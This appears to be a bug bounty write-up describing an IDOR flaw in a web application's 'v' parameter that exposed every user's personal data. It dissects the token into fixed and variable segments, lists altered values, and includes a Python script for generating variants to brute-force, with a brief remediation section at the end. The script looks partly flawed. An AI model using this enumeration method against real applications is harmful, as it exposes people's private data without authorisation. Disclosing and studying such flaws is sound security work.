$1800 Bounty: Exploiting Unpredictable Data that Leads to All Users PII Exposure in an IDOR Vulnerability (Real-World)
Introduction
The security of user data is paramount in web applications. However, vulnerabilities like Insecure Direct Object Reference (IDOR) can compromise data integrity. In this write-up, we delve into an IDOR vulnerability within the ‘v’ parameter of a real-world web application. I illustrate how I could exploit this vulnerability, leading to data disclosure of all users, and emphasize the need for robust security measures. It’s important to note that the ‘v’ parameter value is 64 characters in length, making it unpredictable and lengthy.
Analyzing the ‘v’ Parameter:
vnntxrjonnnrtgxntkxtgyjyinvrmrzojygtnkxnugorqnjnzyjrirgirnittghnThe pattern that I have discovered after analyzing the value:
vnnt {xrjo} nnnr {tgx} ntkx {tgyj} yinvr {mrzo} jyg {tnkxn} ugor {qnjn} zyjr {irgirnittghn}In this parameter, the constant parts within curly braces are as follows:
- {xrjo}
- {tgx}
- {tgyj}
- {mrzo}
- {tnkxn}
- {qnjn}
- {irgirnittghn}
The changeable parts are the characters outside of the curly braces, which we can modify to exploit the vulnerability.
Exploiting the Vulnerability
To exploit the IDOR vulnerability, we can make partial and unpredictable changes outside the curly braces. This means altering only a few characters outside of the curly braces while keeping the constant parts within them intact. We can do this in different requests to access different user’s data.
Here’s an example of how I can randomly change portions of the ‘v’ parameter:
Original ‘v’ parameter: “vnnt {xrjo} nnnr {tgx} ntkx {tgyj} yinvr {mrzo} jyg {tnkxn} ugor {qnjn} zyjr {irgirnittghn}”
Some altered values of ‘v’ parameter:
1. `vnnt {xrjo} mqrn {tgx} ntkx {tgyj} yinvr {mrzo} jyg {tnkxn} ugor {qnjn} zyjr {irgirnittghn}`
2. `qrnt {xrjo} nnnr {tgx} ntkx {tgyj} yinvr {mrzo} jyg {tnkxn} ugor {qnjn} zyjr {irgirnittghn}`
3. `zyfr {xrjo} nnnr {tgx} ntkx {tgyj} yinvr {mrzo} jyg {tnkxn} ugor {qnjn} zyjr {irgirnittghn}`
In each of these examples, only specific portions of the characters outside of the curly braces have been changed, while the rest remain unchanged.
Let’s use Intruder to automatically bruteforce these portions:
I have also written a Python script to generate altered ‘v’ parameters:
import random
import string
# Original 'v' parameter with constant parts
original_v = "vnnt {xrjo} nnnr {tgx} ntkx {tgyj} yinvr {mrzo} jyg {tnkxn} ugor {qnjn} zyjr {irgirnittghn}"
# Function to make random changes to the 'v' parameter
def alter_v(original_v):
# Split the original parameter into constant and changeable parts
parts = original_v.split('{')
constant_parts = ['{' + part for part in parts[1:]]
changeable_part = parts[0]
# Generate random changes to the changeable part
num_changes = random.randint(1, len(changeable_part) - 1)
change_indices = random.sample(range(len(changeable_part)), num_changes)
altered_changeable_part = list(changeable_part)
for index in change_indices:
altered_changeable_part[index] = random.choice(string.ascii_lowercase)
# Construct the altered 'v' parameter
altered_v = ''.join(altered_changeable_part + constant_parts)
return altered_v
# Generate and print altered 'v' parameters
for i in range(5):
altered_parameter = alter_v(original_v)
print(f"Altered 'v' Parameter {i + 1}: {altered_parameter}")This script takes the original ‘v’ parameter, splits it into constant and changeable parts, and then randomly changes some characters in the changeable part while keeping the constant parts intact. It generates and prints five altered ‘v’ parameters as examples.
Here are responses that I have received, which result in the leakage of each user’s data:
Resolving the Vulnerability
To address the IDOR vulnerability, robust authorization and validation mechanisms should be implemented within the application. Relying on predictable patterns or identifiers within URL parameters for user data access must be eliminated. Stringent access controls are essential to prevent unauthorized data breaches.
